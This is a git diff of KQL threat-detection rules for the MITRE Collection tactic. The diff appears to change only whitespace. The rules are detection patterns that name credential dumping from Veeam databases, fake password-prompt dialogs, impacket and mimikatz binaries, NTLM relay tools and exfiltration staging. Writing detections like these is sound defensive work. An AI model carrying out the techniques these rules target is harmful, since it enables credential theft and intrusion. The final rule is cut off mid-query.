+// Description: One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1005 +// False Positives: +// - Legitimate use + +DeviceProcessEvents | where (ProcessCommandLine contains "-r" or ProcessCommandLine contains "/r" or ProcessCommandLine contains "–r" or ProcessCommandLine contains "—r" or ProcessCommandLine contains "―r") and (FolderPath endswith "\\esentutl.exe" or ProcessVersionInfoOriginalFileName =~ "esentutl.exe") and ProcessCommandLine contains "\\Windows\\WebCache" \ No newline at end of file diff --git a/KQL/rules/Collection/files_added_to_an_archive_using_rar_exe.kql b/KQL/rules/Collection/files_added_to_an_archive_using_rar_exe.kql index 60d93348..2c0d4451 100644 --- a/KQL/rules/Collection/files_added_to_an_archive_using_rar_exe.kql +++ b/KQL/rules/Collection/files_added_to_an_archive_using_rar_exe.kql @@ -1,12 +1,12 @@ -// Title: Files Added To An Archive Using Rar.EXE -// Author: Timur Zinniatullin, E.M. Anhaus, oscd.community -// Date: 2019-10-21 -// Level: low -// Description: Detects usage of "rar" to add files to an archive for potential compression. An adversary may compress data (e.g. sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. -// MITRE Tactic: Collection -// Tags: attack.collection, attack.t1560.001 -// False Positives: -// - Highly likely if rar is a default archiver in the monitored environment. - -DeviceProcessEvents +// Title: Files Added To An Archive Using Rar.EXE +// Author: Timur Zinniatullin, E.M. Anhaus, oscd.community +// Date: 2019-10-21 +// Level: low +// Description: Detects usage of "rar" to add files to an archive for potential compression. An adversary may compress data (e.g. sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1560.001 +// False Positives: +// - Highly likely if rar is a default archiver in the monitored environment. + +DeviceProcessEvents | where ProcessCommandLine contains " a " and FolderPath endswith "\\rar.exe" \ No newline at end of file diff --git a/KQL/rules/Collection/folder_compress_to_potentially_suspicious_output_via_compress_archive_cmdlet.kql b/KQL/rules/Collection/folder_compress_to_potentially_suspicious_output_via_compress_archive_cmdlet.kql index 2527fbd7..43dbbbac 100644 --- a/KQL/rules/Collection/folder_compress_to_potentially_suspicious_output_via_compress_archive_cmdlet.kql +++ b/KQL/rules/Collection/folder_compress_to_potentially_suspicious_output_via_compress_archive_cmdlet.kql @@ -1,11 +1,11 @@ -// Title: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet -// Author: Nasreddine Bencherchali (Nextron Systems), frack113 -// Date: 2021-07-20 -// Level: medium -// Description: Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. -// An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. -// MITRE Tactic: Collection -// Tags: attack.collection, attack.t1074.001 - -DeviceProcessEvents +// Title: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet +// Author: Nasreddine Bencherchali (Nextron Systems), frack113 +// Date: 2021-07-20 +// Level: medium +// Description: Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. +// An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1074.001 + +DeviceProcessEvents | where (ProcessCommandLine contains "Compress-Archive -Path" and ProcessCommandLine contains "-DestinationPath $env:TEMP") or (ProcessCommandLine contains "Compress-Archive -Path" and ProcessCommandLine contains "-DestinationPath" and ProcessCommandLine contains "\\AppData\\Local\\Temp\\") or (ProcessCommandLine contains "Compress-Archive -Path" and ProcessCommandLine contains "-DestinationPath" and ProcessCommandLine contains ":\\Windows\\Temp\\") \ No newline at end of file diff --git a/KQL/rules/Collection/gui_input_capture_macos.kql b/KQL/rules/Collection/gui_input_capture_macos.kql index fad2568a..084037f2 100644 --- a/KQL/rules/Collection/gui_input_capture_macos.kql +++ b/KQL/rules/Collection/gui_input_capture_macos.kql @@ -1,12 +1,12 @@ -// Title: GUI Input Capture - macOS -// Author: remotephone, oscd.community -// Date: 2020-10-13 -// Level: low -// Description: Detects attempts to use system dialog prompts to capture user credentials -// MITRE Tactic: Collection -// Tags: attack.collection, attack.credential-access, attack.t1056.002 -// False Positives: -// - Legitimate administration tools and activities - -DeviceProcessEvents +// Title: GUI Input Capture - macOS +// Author: remotephone, oscd.community +// Date: 2020-10-13 +// Level: low +// Description: Detects attempts to use system dialog prompts to capture user credentials +// MITRE Tactic: Collection +// Tags: attack.collection, attack.credential-access, attack.t1056.002 +// False Positives: +// - Legitimate administration tools and activities + +DeviceProcessEvents | where FolderPath =~ "/usr/sbin/osascript" and (ProcessCommandLine contains "-e" and ProcessCommandLine contains "display" and ProcessCommandLine contains "dialog" and ProcessCommandLine contains "answer") and (ProcessCommandLine contains "admin" or ProcessCommandLine contains "administrator" or ProcessCommandLine contains "authenticate" or ProcessCommandLine contains "authentication" or ProcessCommandLine contains "credentials" or ProcessCommandLine contains "pass" or ProcessCommandLine contains "password" or ProcessCommandLine contains "unlock") \ No newline at end of file diff --git a/KQL/rules/Collection/hacktool_adcspwn_execution.kql b/KQL/rules/Collection/hacktool_adcspwn_execution.kql index 95eee526..48597c07 100644 --- a/KQL/rules/Collection/hacktool_adcspwn_execution.kql +++ b/KQL/rules/Collection/hacktool_adcspwn_execution.kql @@ -1,12 +1,12 @@ -// Title: HackTool - ADCSPwn Execution -// Author: Florian Roth (Nextron Systems) -// Date: 2021-07-31 -// Level: high -// Description: Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service -// MITRE Tactic: Collection -// Tags: attack.collection, attack.credential-access, attack.t1557.001 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: HackTool - ADCSPwn Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2021-07-31 +// Level: high +// Description: Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service +// MITRE Tactic: Collection +// Tags: attack.collection, attack.credential-access, attack.t1557.001 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ProcessCommandLine contains " --adcs " and ProcessCommandLine contains " --port " \ No newline at end of file diff --git a/KQL/rules/Collection/hacktool_impacket_tools_execution.kql b/KQL/rules/Collection/hacktool_impacket_tools_execution.kql index 6d70bb10..1bc4a784 100644 --- a/KQL/rules/Collection/hacktool_impacket_tools_execution.kql +++ b/KQL/rules/Collection/hacktool_impacket_tools_execution.kql @@ -1,12 +1,12 @@ -// Title: HackTool - Impacket Tools Execution -// Author: Florian Roth (Nextron Systems) -// Date: 2021-07-24 -// Level: high -// Description: Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives) -// MITRE Tactic: Collection -// Tags: attack.collection, attack.execution, attack.credential-access, attack.t1557.001 -// False Positives: -// - Legitimate use of the impacket tools - -DeviceProcessEvents +// Title: HackTool - Impacket Tools Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2021-07-24 +// Level: high +// Description: Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives) +// MITRE Tactic: Collection +// Tags: attack.collection, attack.execution, attack.credential-access, attack.t1557.001 +// False Positives: +// - Legitimate use of the impacket tools + +DeviceProcessEvents | where (FolderPath contains "\\goldenPac" or FolderPath contains "\\karmaSMB" or FolderPath contains "\\kintercept" or FolderPath contains "\\ntlmrelayx" or FolderPath contains "\\rpcdump" or FolderPath contains "\\samrdump" or FolderPath contains "\\secretsdump" or FolderPath contains "\\smbexec" or FolderPath contains "\\smbrelayx" or FolderPath contains "\\wmiexec" or FolderPath contains "\\wmipersist") or (FolderPath endswith "\\atexec_windows.exe" or FolderPath endswith "\\dcomexec_windows.exe" or FolderPath endswith "\\dpapi_windows.exe" or FolderPath endswith "\\findDelegation_windows.exe" or FolderPath endswith "\\GetADUsers_windows.exe" or FolderPath endswith "\\GetNPUsers_windows.exe" or FolderPath endswith "\\getPac_windows.exe" or FolderPath endswith "\\getST_windows.exe" or FolderPath endswith "\\getTGT_windows.exe" or FolderPath endswith "\\GetUserSPNs_windows.exe" or FolderPath endswith "\\ifmap_windows.exe" or FolderPath endswith "\\mimikatz_windows.exe" or FolderPath endswith "\\netview_windows.exe" or FolderPath endswith "\\nmapAnswerMachine_windows.exe" or FolderPath endswith "\\opdump_windows.exe" or FolderPath endswith "\\psexec_windows.exe" or FolderPath endswith "\\rdp_check_windows.exe" or FolderPath endswith "\\sambaPipe_windows.exe" or FolderPath endswith "\\smbclient_windows.exe" or FolderPath endswith "\\smbserver_windows.exe" or FolderPath endswith "\\sniff_windows.exe" or FolderPath endswith "\\sniffer_windows.exe" or FolderPath endswith "\\split_windows.exe" or FolderPath endswith "\\ticketer_windows.exe") \ No newline at end of file diff --git a/KQL/rules/Collection/periodic_backup_for_system_registry_hives_enabled.kql b/KQL/rules/Collection/periodic_backup_for_system_registry_hives_enabled.kql index f7b1c794..626c2a50 100644 --- a/KQL/rules/Collection/periodic_backup_for_system_registry_hives_enabled.kql +++ b/KQL/rules/Collection/periodic_backup_for_system_registry_hives_enabled.kql @@ -1,13 +1,13 @@ -// Title: Periodic Backup For System Registry Hives Enabled -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2024-07-01 -// Level: medium -// Description: Detects the enabling of the "EnablePeriodicBackup" registry value. Once enabled, The OS will backup System registry hives on restarts to the "C:\Windows\System32\config\RegBack" folder. Windows creates a "RegIdleBackup" task to manage subsequent backups. -// Registry backup was a default behavior on Windows and was disabled as of "Windows 10, version 1803". -// MITRE Tactic: Collection -// Tags: attack.collection, attack.t1113 -// False Positives: -// - Legitimate need for RegBack feature by administrators. - -DeviceRegistryEvents +// Title: Periodic Backup For System Registry Hives Enabled +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-07-01 +// Level: medium +// Description: Detects the enabling of the "EnablePeriodicBackup" registry value. Once enabled, The OS will backup System registry hives on restarts to the "C:\Windows\System32\config\RegBack" folder. Windows creates a "RegIdleBackup" task to manage subsequent backups. +// Registry backup was a default behavior on Windows and was disabled as of "Windows 10, version 1803". +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1113 +// False Positives: +// - Legitimate need for RegBack feature by administrators. + +DeviceRegistryEvents | where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Control\\Session Manager\\Configuration Manager\\EnablePeriodicBackup" \ No newline at end of file diff --git a/KQL/rules/Collection/potential_smb_relay_attack_tool_execution.kql b/KQL/rules/Collection/potential_smb_relay_attack_tool_execution.kql index 2e442414..9a5eaee6 100644 --- a/KQL/rules/Collection/potential_smb_relay_attack_tool_execution.kql +++ b/KQL/rules/Collection/potential_smb_relay_attack_tool_execution.kql @@ -1,12 +1,12 @@ -// Title: Potential SMB Relay Attack Tool Execution -// Author: Florian Roth (Nextron Systems) -// Date: 2021-07-24 -// Level: critical -// Description: Detects different hacktools used for relay attacks on Windows for privilege escalation -// MITRE Tactic: Collection -// Tags: attack.collection, attack.execution, attack.credential-access, attack.t1557.001 -// False Positives: -// - Legitimate files with these rare hacktool names - -DeviceProcessEvents +// Title: Potential SMB Relay Attack Tool Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2021-07-24 +// Level: critical +// Description: Detects different hacktools used for relay attacks on Windows for privilege escalation +// MITRE Tactic: Collection +// Tags: attack.collection, attack.execution, attack.credential-access, attack.t1557.001 +// False Positives: +// - Legitimate files with these rare hacktool names + +DeviceProcessEvents | where ((ProcessCommandLine contains ".exe -c \"{" and ProcessCommandLine endswith "}\" -z") or (FolderPath contains "PetitPotam" or FolderPath contains "RottenPotato" or FolderPath contains "HotPotato" or FolderPath contains "JuicyPotato" or FolderPath contains "\\just_dce_" or FolderPath contains "Juicy Potato" or FolderPath contains "\\temp\\rot.exe" or FolderPath contains "\\Potato.exe" or FolderPath contains "\\SpoolSample.exe" or FolderPath contains "\\Responder.exe" or FolderPath contains "\\smbrelayx" or FolderPath contains "\\ntlmrelayx" or FolderPath contains "\\LocalPotato") or (ProcessCommandLine contains "Invoke-Tater" or ProcessCommandLine contains " smbrelay" or ProcessCommandLine contains " ntlmrelay" or ProcessCommandLine contains "cme smb " or ProcessCommandLine contains " /ntlm:NTLMhash " or ProcessCommandLine contains "Invoke-PetitPotam" or (ProcessCommandLine contains ".exe -t " and ProcessCommandLine contains " -p "))) and (not((FolderPath contains "HotPotatoes6" or FolderPath contains "HotPotatoes7" or FolderPath contains "HotPotatoes "))) \ No newline at end of file diff --git a/KQL/rules/Collection/potential_suspicious_activity_using_secedit.kql b/KQL/rules/Collection/potential_suspicious_activity_using_secedit.kql index 102b810c..13825854 100644 --- a/KQL/rules/Collection/potential_suspicious_activity_using_secedit.kql +++ b/KQL/rules/Collection/potential_suspicious_activity_using_secedit.kql @@ -1,12 +1,12 @@ -// Title: Potential Suspicious Activity Using SeCEdit -// Author: Janantha Marasinghe -// Date: 2022-11-18 -// Level: medium -// Description: Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy -// MITRE Tactic: Collection -// Tags: attack.collection, attack.discovery, attack.persistence, attack.defense-evasion, attack.credential-access, attack.privilege-escalation, attack.t1562.002, attack.t1547.001, attack.t1505.005, attack.t1556.002, attack.t1562, attack.t1574.007, attack.t1564.002, attack.t1546.008, attack.t1546.007, attack.t1547.014, attack.t1547.010, attack.t1547.002, attack.t1557, attack.t1082 -// False Positives: -// - Legitimate administrative use - -DeviceProcessEvents +// Title: Potential Suspicious Activity Using SeCEdit +// Author: Janantha Marasinghe +// Date: 2022-11-18 +// Level: medium +// Description: Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy +// MITRE Tactic: Collection +// Tags: attack.collection, attack.discovery, attack.persistence, attack.defense-evasion, attack.credential-access, attack.privilege-escalation, attack.t1562.002, attack.t1547.001, attack.t1505.005, attack.t1556.002, attack.t1562, attack.t1574.007, attack.t1564.002, attack.t1546.008, attack.t1546.007, attack.t1547.014, attack.t1547.010, attack.t1547.002, attack.t1557, attack.t1082 +// False Positives: +// - Legitimate administrative use + +DeviceProcessEvents | where (FolderPath endswith "\\secedit.exe" or ProcessVersionInfoOriginalFileName =~ "SeCEdit") and ((ProcessCommandLine contains "/configure" and ProcessCommandLine contains "/db") or (ProcessCommandLine contains "/export" and ProcessCommandLine contains "/cfg")) \ No newline at end of file diff --git a/KQL/rules/Collection/powershell_get_clipboard_cmdlet_via_cli.kql b/KQL/rules/Collection/powershell_get_clipboard_cmdlet_via_cli.kql index 45d6cab7..ce241746 100644 --- a/KQL/rules/Collection/powershell_get_clipboard_cmdlet_via_cli.kql +++ b/KQL/rules/Collection/powershell_get_clipboard_cmdlet_via_cli.kql @@ -1,10 +1,10 @@ -// Title: PowerShell Get-Clipboard Cmdlet Via CLI -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2020-05-02 -// Level: medium -// Description: Detects usage of the 'Get-Clipboard' cmdlet via CLI -// MITRE Tactic: Collection -// Tags: attack.collection, attack.t1115 - -DeviceProcessEvents +// Title: PowerShell Get-Clipboard Cmdlet Via CLI +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2020-05-02 +// Level: medium +// Description: Detects usage of the 'Get-Clipboard' cmdlet via CLI +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1115 + +DeviceProcessEvents | where ProcessCommandLine contains "Get-Clipboard" \ No newline at end of file diff --git a/KQL/rules/Collection/processes_accessing_the_microphone_and_webcam.kql b/KQL/rules/Collection/processes_accessing_the_microphone_and_webcam.kql index 0c3172f6..b9354612 100644 --- a/KQL/rules/Collection/processes_accessing_the_microphone_and_webcam.kql +++ b/KQL/rules/Collection/processes_accessing_the_microphone_and_webcam.kql @@ -1,10 +1,10 @@ -// Title: Processes Accessing the Microphone and Webcam -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2020-06-07 -// Level: medium -// Description: Potential adversaries accessing the microphone and webcam in an endpoint. -// MITRE Tactic: Collection -// Tags: attack.collection, attack.t1123 - -DeviceRegistryEvents +// Title: Processes Accessing the Microphone and Webcam +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +// Date: 2020-06-07 +// Level: medium +// Description: Potential adversaries accessing the microphone and webcam in an endpoint. +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1123 + +DeviceRegistryEvents | where RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\ConsentStore\\microphone\\NonPackaged" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\ConsentStore\\webcam\\NonPackaged" \ No newline at end of file diff --git a/KQL/rules/Collection/rar_usage_with_password_and_compression_level.kql b/KQL/rules/Collection/rar_usage_with_password_and_compression_level.kql index 78eedc5e..1a9de391 100644 --- a/KQL/rules/Collection/rar_usage_with_password_and_compression_level.kql +++ b/KQL/rules/Collection/rar_usage_with_password_and_compression_level.kql @@ -1,13 +1,13 @@ -// Title: Rar Usage with Password and Compression Level -// Author: @ROxPinTeddy -// Date: 2020-05-12 -// Level: high -// Description: Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions. -// MITRE Tactic: Collection -// Tags: attack.collection, attack.t1560.001 -// False Positives: -// - Legitimate use of Winrar command line version -// - Other command line tools, that use these flags - -DeviceProcessEvents +// Title: Rar Usage with Password and Compression Level +// Author: @ROxPinTeddy +// Date: 2020-05-12 +// Level: high +// Description: Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions. +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1560.001 +// False Positives: +// - Legitimate use of Winrar command line version +// - Other command line tools, that use these flags + +DeviceProcessEvents | where ProcessCommandLine contains " -hp" and (ProcessCommandLine contains " -m" or ProcessCommandLine contains " a ") \ No newline at end of file diff --git a/KQL/rules/Collection/recon_information_for_export_with_command_prompt.kql b/KQL/rules/Collection/recon_information_for_export_with_command_prompt.kql index 65fad7a0..632091d5 100644 --- a/KQL/rules/Collection/recon_information_for_export_with_command_prompt.kql +++ b/KQL/rules/Collection/recon_information_for_export_with_command_prompt.kql @@ -1,10 +1,10 @@ -// Title: Recon Information for Export with Command Prompt -// Author: frack113 -// Date: 2021-07-30 -// Level: medium -// Description: Once established within a system or network, an adversary may use automated techniques for collecting internal data. -// MITRE Tactic: Collection -// Tags: attack.collection, attack.t1119 - -DeviceProcessEvents +// Title: Recon Information for Export with Command Prompt +// Author: frack113 +// Date: 2021-07-30 +// Level: medium +// Description: Once established within a system or network, an adversary may use automated techniques for collecting internal data. +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1119 + +DeviceProcessEvents | where ((FolderPath endswith "\\tree.com" or FolderPath endswith "\\WMIC.exe" or FolderPath endswith "\\doskey.exe" or FolderPath endswith "\\sc.exe") or (ProcessVersionInfoOriginalFileName in~ ("wmic.exe", "DOSKEY.EXE", "sc.exe"))) and (InitiatingProcessCommandLine contains " > %TEMP%\\" or InitiatingProcessCommandLine contains " > %TMP%\\") \ No newline at end of file diff --git a/KQL/rules/Collection/screen_capture_activity_via_psr_exe.kql b/KQL/rules/Collection/screen_capture_activity_via_psr_exe.kql index 1ddc1555..7c7ed0ca 100644 --- a/KQL/rules/Collection/screen_capture_activity_via_psr_exe.kql +++ b/KQL/rules/Collection/screen_capture_activity_via_psr_exe.kql @@ -1,10 +1,10 @@ -// Title: Screen Capture Activity Via Psr.EXE -// Author: Beyu Denis, oscd.community -// Date: 2019-10-12 -// Level: medium -// Description: Detects execution of Windows Problem Steps Recorder (psr.exe), a utility used to record the user screen and clicks. -// MITRE Tactic: Collection -// Tags: attack.collection, attack.t1113 - -DeviceProcessEvents +// Title: Screen Capture Activity Via Psr.EXE +// Author: Beyu Denis, oscd.community +// Date: 2019-10-12 +// Level: medium +// Description: Detects execution of Windows Problem Steps Recorder (psr.exe), a utility used to record the user screen and clicks. +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1113 + +DeviceProcessEvents | where (ProcessCommandLine contains "/start" or ProcessCommandLine contains "-start") and FolderPath endswith "\\Psr.exe" \ No newline at end of file diff --git a/KQL/rules/Collection/screen_capture_macos.kql b/KQL/rules/Collection/screen_capture_macos.kql index e12abbe0..42dc015a 100644 --- a/KQL/rules/Collection/screen_capture_macos.kql +++ b/KQL/rules/Collection/screen_capture_macos.kql @@ -1,12 +1,12 @@ -// Title: Screen Capture - macOS -// Author: remotephone, oscd.community -// Date: 2020-10-13 -// Level: low -// Description: Detects attempts to use screencapture to collect macOS screenshots -// MITRE Tactic: Collection -// Tags: attack.collection, attack.t1113 -// False Positives: -// - Legitimate user activity taking screenshots - -DeviceProcessEvents +// Title: Screen Capture - macOS +// Author: remotephone, oscd.community +// Date: 2020-10-13 +// Level: low +// Description: Detects attempts to use screencapture to collect macOS screenshots +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1113 +// False Positives: +// - Legitimate user activity taking screenshots + +DeviceProcessEvents | where FolderPath =~ "/usr/sbin/screencapture" \ No newline at end of file diff --git a/KQL/rules/Collection/suspicious_camera_and_microphone_access.kql b/KQL/rules/Collection/suspicious_camera_and_microphone_access.kql index df63d384..4cce5079 100644 --- a/KQL/rules/Collection/suspicious_camera_and_microphone_access.kql +++ b/KQL/rules/Collection/suspicious_camera_and_microphone_access.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Camera and Microphone Access -// Author: Den Iuzvyk -// Date: 2020-06-07 -// Level: high -// Description: Detects Processes accessing the camera and microphone from suspicious folder -// MITRE Tactic: Collection -// Tags: attack.collection, attack.t1125, attack.t1123 -// False Positives: -// - Unlikely, there could be conferencing software running from a Temp folder accessing the devices - -DeviceRegistryEvents +// Title: Suspicious Camera and Microphone Access +// Author: Den Iuzvyk +// Date: 2020-06-07 +// Level: high +// Description: Detects Processes accessing the camera and microphone from suspicious folder +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1125, attack.t1123 +// False Positives: +// - Unlikely, there could be conferencing software running from a Temp folder accessing the devices + +DeviceRegistryEvents | where (RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\ConsentStore*" and RegistryKey contains "\\NonPackaged") and (RegistryKey contains "microphone" or RegistryKey contains "webcam") and (RegistryKey contains ":#Windows#Temp#" or RegistryKey contains ":#$Recycle.bin#" or RegistryKey contains ":#Temp#" or RegistryKey contains ":#Users#Public#" or RegistryKey contains ":#Users#Default#" or RegistryKey contains ":#Users#Desktop#") \ No newline at end of file diff --git a/KQL/rules/Collection/suspicious_manipulation_of_default_accounts_via_net_exe.kql b/KQL/rules/Collection/suspicious_manipulation_of_default_accounts_via_net_exe.kql index 800c1fea..000c2506 100644 --- a/KQL/rules/Collection/suspicious_manipulation_of_default_accounts_via_net_exe.kql +++ b/KQL/rules/Collection/suspicious_manipulation_of_default_accounts_via_net_exe.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Manipulation Of Default Accounts Via Net.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-09-01 -// Level: high -// Description: Detects suspicious manipulations of default accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc -// MITRE Tactic: Collection -// Tags: attack.collection, attack.t1560.001 -// False Positives: -// - Some false positives could occur with the admin or guest account. It depends on the scripts being used by the admins in your env. If you experience a lot of FP you could reduce the level to medium - -DeviceProcessEvents +// Title: Suspicious Manipulation Of Default Accounts Via Net.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-01 +// Level: high +// Description: Detects suspicious manipulations of default accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1560.001 +// False Positives: +// - Some false positives could occur with the admin or guest account. It depends on the scripts being used by the admins in your env. If you experience a lot of FP you could reduce the level to medium + +DeviceProcessEvents | where (((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe"))) and ProcessCommandLine contains " user " and (ProcessCommandLine contains " Järjestelmänvalvoja " or ProcessCommandLine contains " Rendszergazda " or ProcessCommandLine contains " Администратор " or ProcessCommandLine contains " Administrateur " or ProcessCommandLine contains " Administrador " or ProcessCommandLine contains " Administratör " or ProcessCommandLine contains " Administrator " or ProcessCommandLine contains " guest " or ProcessCommandLine contains " DefaultAccount " or ProcessCommandLine contains " \"Järjestelmänvalvoja\" " or ProcessCommandLine contains " \"Rendszergazda\" " or ProcessCommandLine contains " \"Администратор\" " or ProcessCommandLine contains " \"Administrateur\" " or ProcessCommandLine contains " \"Administrador\" " or ProcessCommandLine contains " \"Administratör\" " or ProcessCommandLine contains " \"Administrator\" " or ProcessCommandLine contains " \"guest\" " or ProcessCommandLine contains " \"DefaultAccount\" " or ProcessCommandLine contains " 'Järjestelmänvalvoja' " or ProcessCommandLine contains " 'Rendszergazda' " or ProcessCommandLine contains " 'Администратор' " or ProcessCommandLine contains " 'Administrateur' " or ProcessCommandLine contains " 'Administrador' " or ProcessCommandLine contains " 'Administratör' " or ProcessCommandLine contains " 'Administrator' " or ProcessCommandLine contains " 'guest' " or ProcessCommandLine contains " 'DefaultAccount' ")) and (not((ProcessCommandLine contains "guest" and ProcessCommandLine contains "/active no"))) \ No newline at end of file diff --git a/KQL/rules/Collection/veeam_backup_database_suspicious_query.kql b/KQL/rules/Collection/veeam_backup_database_suspicious_query.kql index 1fde3264..2aafc9c5 100644 --- a/KQL/rules/Collection/veeam_backup_database_suspicious_query.kql +++ b/KQL/rules/Collection/veeam_backup_database_suspicious_query.kql @@ -1,10 +1,10 @@ -// Title: Veeam Backup Database Suspicious Query -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-04 -// Level: medium -// Description: Detects potentially suspicious SQL queries using SQLCmd targeting the Veeam backup databases in order to steal information. -// MITRE Tactic: Collection -// Tags: attack.collection, attack.t1005 - -DeviceProcessEvents +// Title: Veeam Backup Database Suspicious Query +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-04 +// Level: medium +// Description: Detects potentially suspicious SQL queries using SQLCmd targeting the Veeam backup databases in order to steal information. +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1005 + +DeviceProcessEvents | where (ProcessCommandLine contains "BackupRepositories" or ProcessCommandLine contains "Backups" or ProcessCommandLine contains "Credentials" or ProcessCommandLine contains "HostCreds" or ProcessCommandLine contains "SmbFileShares" or ProcessCommandLine contains "Ssh_creds" or ProcessCommandLine contains "VSphereInfo") and ((ProcessCommandLine contains "VeeamBackup" and ProcessCommandLine contains "From ") and FolderPath endswith "\\sqlcmd.exe") \ No newline at end of file diff --git a/KQL/rules/Collection/veeambackup_database_credentials_dump_via_sqlcmd_exe.kql b/KQL/rules/Collection/veeambackup_database_credentials_dump_via_sqlcmd_exe.kql index 6318e563..ecb12649 100644 --- a/KQL/rules/Collection/veeambackup_database_credentials_dump_via_sqlcmd_exe.kql +++ b/KQL/rules/Collection/veeambackup_database_credentials_dump_via_sqlcmd_exe.kql @@ -1,10 +1,10 @@ -// Title: VeeamBackup Database Credentials Dump Via Sqlcmd.EXE -// Author: frack113 -// Date: 2021-12-20 -// Level: high -// Description: Detects dump of credentials in VeeamBackup dbo -// MITRE Tactic: Collection -// Tags: attack.collection, attack.t1005 - -DeviceProcessEvents +// Title: VeeamBackup Database Credentials Dump Via Sqlcmd.EXE +// Author: frack113 +// Date: 2021-12-20 +// Level: high +// Description: Detects dump of credentials in VeeamBackup dbo +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1005 + +DeviceProcessEvents | where (ProcessCommandLine contains "SELECT" and ProcessCommandLine contains "TOP" and ProcessCommandLine contains "[VeeamBackup].[dbo].[Credentials]") and FolderPath endswith "\\sqlcmd.exe" \ No newline at end of file diff --git a/KQL/rules/Collection/windows_recall_feature_enabled_disableaidataanalysis_value_deleted.kql b/KQL/rules/Collection/windows_recall_feature_enabled_disableaidataanalysis_value_deleted.kql index 03288f4b..983c3ae0 100644 --- a/KQL/rules/Collection/windows_recall_feature_enabled_disableaidataanalysis_value_deleted.kql +++ b/KQL/rules/Collection/windows_recall_feature_enabled_disableaidataanalysis_value_deleted.kql @@ -1,14 +1,14 @@ -// Title: Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted -// Author: Sajid Nawaz Khan -// Date: 2024-06-02 -// Level: medium -// Description: Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by deleting the existing "DisableAIDataAnalysis" registry value. -// Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities. -// This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary. -// MITRE Tactic: Collection -// Tags: attack.collection, attack.t1113 -// False Positives: -// - Legitimate use/activation of Windows Recall - -DeviceRegistryEvents +// Title: Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted +// Author: Sajid Nawaz Khan +// Date: 2024-06-02 +// Level: medium +// Description: Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by deleting the existing "DisableAIDataAnalysis" registry value. +// Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities. +// This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary. +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1113 +// False Positives: +// - Legitimate use/activation of Windows Recall + +DeviceRegistryEvents | where ActionType =~ 